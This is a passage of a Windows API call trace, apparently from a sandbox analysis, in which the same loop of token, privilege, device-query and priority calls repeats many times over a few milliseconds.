0x3f0 [0085.208] GetCurrentProcess () returned 0xffffffff [0085.208] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.208] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.208] SetLastError (dwErrCode=0x522) [0085.208] CloseHandle (hObject=0x114) returned 1 [0085.208] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.208] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.208] GetLastError () returned 0x578 [0085.208] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.208] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.208] GetCurrentThread () returned 0xfffffffe [0085.208] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.208] GetLastError () returned 0x3f0 [0085.208] GetCurrentProcess () returned 0xffffffff [0085.208] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.208] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.208] SetLastError (dwErrCode=0x522) [0085.208] CloseHandle (hObject=0x114) returned 1 [0085.208] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.208] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.208] GetLastError () returned 0x578 [0085.208] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.208] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.209] GetCurrentThread () returned 0xfffffffe [0085.209] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.209] GetLastError () returned 0x3f0 [0085.209] GetCurrentProcess () returned 0xffffffff [0085.209] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.209] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.209] SetLastError (dwErrCode=0x522) [0085.209] CloseHandle (hObject=0x114) returned 1 [0085.209] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.209] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.209] GetLastError () returned 0x578 [0085.209] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.209] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.209] GetCurrentThread () returned 0xfffffffe [0085.209] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.209] GetLastError () returned 0x3f0 [0085.209] GetCurrentProcess () returned 0xffffffff [0085.209] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.209] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.209] SetLastError (dwErrCode=0x522) [0085.209] CloseHandle (hObject=0x114) returned 1 [0085.209] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.209] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.209] GetLastError () returned 0x578 [0085.209] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.209] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.209] GetCurrentThread () returned 0xfffffffe [0085.209] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.209] GetLastError () returned 0x3f0 [0085.209] GetCurrentProcess () returned 0xffffffff [0085.209] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.209] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.209] SetLastError (dwErrCode=0x522) [0085.209] CloseHandle (hObject=0x114) returned 1 [0085.209] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.209] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.209] GetLastError () returned 0x578 [0085.209] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.209] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.210] GetCurrentThread () returned 0xfffffffe [0085.210] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.210] GetLastError () returned 0x3f0 [0085.210] GetCurrentProcess () returned 0xffffffff [0085.210] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.210] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.210] SetLastError (dwErrCode=0x522) [0085.210] CloseHandle (hObject=0x114) returned 1 [0085.210] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.210] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.210] GetLastError () returned 0x578 [0085.210] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.210] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.210] GetCurrentThread () returned 0xfffffffe [0085.210] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.210] GetLastError () returned 0x3f0 [0085.210] GetCurrentProcess () returned 0xffffffff [0085.210] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.210] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.210] SetLastError (dwErrCode=0x522) [0085.210] CloseHandle (hObject=0x114) returned 1 [0085.210] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.210] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.210] GetLastError () returned 0x578 [0085.210] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.210] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.210] GetCurrentThread () returned 0xfffffffe [0085.210] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.210] GetLastError () returned 0x3f0 [0085.210] GetCurrentProcess () returned 0xffffffff [0085.210] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.210] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.210] SetLastError (dwErrCode=0x522) [0085.210] CloseHandle (hObject=0x114) returned 1 [0085.210] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.210] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.210] GetLastError () returned 0x578 [0085.210] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.210] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.211] GetCurrentThread () returned 0xfffffffe [0085.211] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.211] GetLastError () returned 0x3f0 [0085.211] GetCurrentProcess () returned 0xffffffff [0085.211] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.211] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.211] SetLastError (dwErrCode=0x522) [0085.211] CloseHandle (hObject=0x114) returned 1 [0085.211] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.211] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.211] GetLastError () returned 0x578 [0085.211] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.211] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.211] GetCurrentThread () returned 0xfffffffe [0085.211] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.211] GetLastError () returned 0x3f0 [0085.211] GetCurrentProcess () returned 0xffffffff [0085.211] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.211] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.211] SetLastError (dwErrCode=0x522) [0085.211] CloseHandle (hObject=0x114) returned 1 [0085.211] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.211] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.211] GetLastError () returned 0x578 [0085.211] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.211] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.211] GetCurrentThread () returned 0xfffffffe [0085.211] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.211] GetLastError () returned 0x3f0 [0085.211] GetCurrentProcess () returned 0xffffffff [0085.211] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.211] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.211] SetLastError (dwErrCode=0x522) [0085.211] CloseHandle (hObject=0x114) returned 1 [0085.211] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.211] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.211] GetLastError () returned 0x578 [0085.211] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.211] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.212] GetCurrentThread () returned 0xfffffffe [0085.212] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.212] GetLastError () returned 0x3f0 [0085.212] GetCurrentProcess () returned 0xffffffff [0085.212] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.212] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.212] SetLastError (dwErrCode=0x522) [0085.212] CloseHandle (hObject=0x114) returned 1 [0085.212] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.212] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.212] GetLastError () returned 0x578 [0085.212] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.212] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.212] GetCurrentThread () returned 0xfffffffe [0085.212] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.212] GetLastError () returned 0x3f0 [0085.212] GetCurrentProcess () returned 0xffffffff [0085.212] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.212] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.212] SetLastError (dwErrCode=0x522) [0085.212] CloseHandle (hObject=0x114) returned 1 [0085.212] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.212] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.212] GetLastError () returned 0x578 [0085.212] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.212] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.212] GetCurrentThread () returned 0xfffffffe [0085.212] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.212] GetLastError () returned 0x3f0 [0085.212] GetCurrentProcess () returned 0xffffffff [0085.212] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.212] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.212] SetLastError (dwErrCode=0x522) [0085.212] CloseHandle (hObject=0x114) returned 1 [0085.212] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.212] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.212] GetLastError () returned 0x578 [0085.212] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.212] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.213] GetCurrentThread () returned 0xfffffffe [0085.213] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.213] GetLastError () returned 0x3f0 [0085.213] GetCurrentProcess () returned 0xffffffff [0085.213] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.213] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.213] SetLastError (dwErrCode=0x522) [0085.213] CloseHandle (hObject=0x114) returned 1 [0085.213] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.213] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.213] GetLastError () returned 0x578 [0085.213] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.213] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.213] GetCurrentThread () returned 0xfffffffe [0085.213] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.213] GetLastError () returned 0x3f0 [0085.213] GetCurrentProcess () returned 0xffffffff [0085.213] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.213] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.213] SetLastError (dwErrCode=0x522) [0085.213] CloseHandle (hObject=0x114) returned 1 [0085.213] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.213] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.213] GetLastError () returned 0x578 [0085.213] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.213] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.213] GetCurrentThread () returned 0xfffffffe [0085.213] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.213] GetLastError () returned 0x3f0 [0085.213] GetCurrentProcess () returned 0xffffffff [0085.213] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.213] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.213] SetLastError (dwErrCode=0x522) [0085.213] CloseHandle (hObject=0x114) returned 1 [0085.213] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.213] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.213] GetLastError () returned 0x578 [0085.213] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.214] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.214] GetCurrentThread () returned 0xfffffffe [0085.214] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.214] GetLastError () returned 0x3f0 [0085.214] GetCurrentProcess () returned 0xffffffff [0085.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.214] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.214] SetLastError (dwErrCode=0x522) [0085.214] CloseHandle (hObject=0x114) returned 1 [0085.214] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.214] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.214] GetLastError () returned 0x578 [0085.214] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.214] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.214] GetCurrentThread () returned 0xfffffffe [0085.214] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.214] GetLastError () returned 0x3f0 [0085.214] GetCurrentProcess () returned 0xffffffff [0085.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.214] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.214] SetLastError (dwErrCode=0x522) [0085.214] CloseHandle (hObject=0x114) returned 1 [0085.214] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.214] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.214] GetLastError () returned 0x578 [0085.214] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.214] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.214] GetCurrentThread () returned 0xfffffffe [0085.214] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.214] GetLastError () returned 0x3f0 [0085.214] GetCurrentProcess () returned 0xffffffff [0085.214] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.214] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.214] SetLastError (dwErrCode=0x522) [0085.214] CloseHandle (hObject=0x114) returned 1 [0085.214] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.214] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.214] GetLastError () returned 0x578 [0085.215] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.215] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.215] GetCurrentThread () returned 0xfffffffe [0085.215] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.215] GetLastError () returned 0x3f0 [0085.215] GetCurrentProcess () returned 0xffffffff [0085.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.215] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.215] SetLastError (dwErrCode=0x522) [0085.215] CloseHandle (hObject=0x114) returned 1 [0085.215] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.215] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.215] GetLastError () returned 0x578 [0085.215] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.215] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.215] GetCurrentThread () returned 0xfffffffe [0085.215] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.215] GetLastError () returned 0x3f0 [0085.215] GetCurrentProcess () returned 0xffffffff [0085.215] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.215] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.215] SetLastError (dwErrCode=0x522) [0085.215] CloseHandle (hObject=0x114) returned 1 [0085.215] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.215] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.215] GetLastError () returned 0x578 [0085.215] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.215] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.215] GetCurrentThread () returned 0xfffffffe [0085.215] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: 